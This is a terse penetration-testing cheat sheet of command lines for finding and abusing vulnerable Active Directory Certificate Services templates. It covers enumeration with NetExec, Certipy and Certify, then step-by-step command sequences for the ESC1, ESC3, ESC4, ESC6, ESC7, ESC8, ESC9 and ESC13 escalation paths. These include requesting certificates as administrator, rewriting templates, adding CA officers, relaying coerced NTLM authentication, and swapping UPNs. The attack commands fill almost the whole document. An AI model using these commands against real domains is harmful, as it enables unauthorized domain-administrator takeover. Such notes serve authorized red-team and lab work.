Enumeration
NetExec
Find PKI Enrollment Services in Active Directory and Certificate Templates Names
1
| nxc ldap ip -u username -p password -M adcs
|
Certipy
Search for vulnerable certificate templates
1
| certipy find -u username -p password -dc-ip ip -target dc -enabled -vulnerable -stdout
|
Certify
Search for vulnerable certificate templates
1
| Certify.exe find /vulnerable
|
Attacks
ESC1
1
| addcomputer.py domain/username:password -computer-name computer_name -computer-pass computer_password
|
1
| certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip
|
Or
1
| certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip
|
Sometimes if you run certipy and see Minimum RSA Key Length : 4096, you need to provide -key-size 4096 to certipy
1
| certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
|
1
| certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip
|
ESC3
1
| certipy req -u username -p password -ca ca -target domain -template template
|
1
| certipy req username -p password -ca ca -target domain -template User -on-behalf-of 'domain\administrator' -pfx pfx_file
|
1
| certipy auth -pfx administrator.pfx -dc-ip ip
|
ESC4
1
| certipy template -u username -p password -template template -save-old -dc-ip ip
|
1
| certipy req -u username -p password -dc-ip ip -ca ca -target dc -template template -upn administrator
|
1
| certipy auth -pfx administrator.pfx -domain domain -u administrator -dc-ip ip
|
ESC6
1
| certipy req -u administrator@domain -p password -ca ca -target domain -template template -upn administrator
|
ESC7
1
| certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
|
1
| certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
|
1
| certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
|
1
| certipy ca -ca ca -issue-request request_ID -u username@domain -p password
|
1
| certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
|
1
| certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip
|
ESC8
1
| ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
|
1
| coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
|
1
| certipy- auth -pfx administrator.pfx
|
ESC9
1
| certipy shadow auto -u username@domain -hashes :hash -account target_username
|
1
| certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
|
1
| certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target $DC_IP
|
1
| certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
|
1
| certipy auth -pfx administrator.pfx -domain domain
|
ESC13
1
| certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip -key-size 4096
|
1
| python3 gettgtpkinit.py -cert-pfx pfx_file domain/username ccache_file -dc-ip ip -v
|
Resources
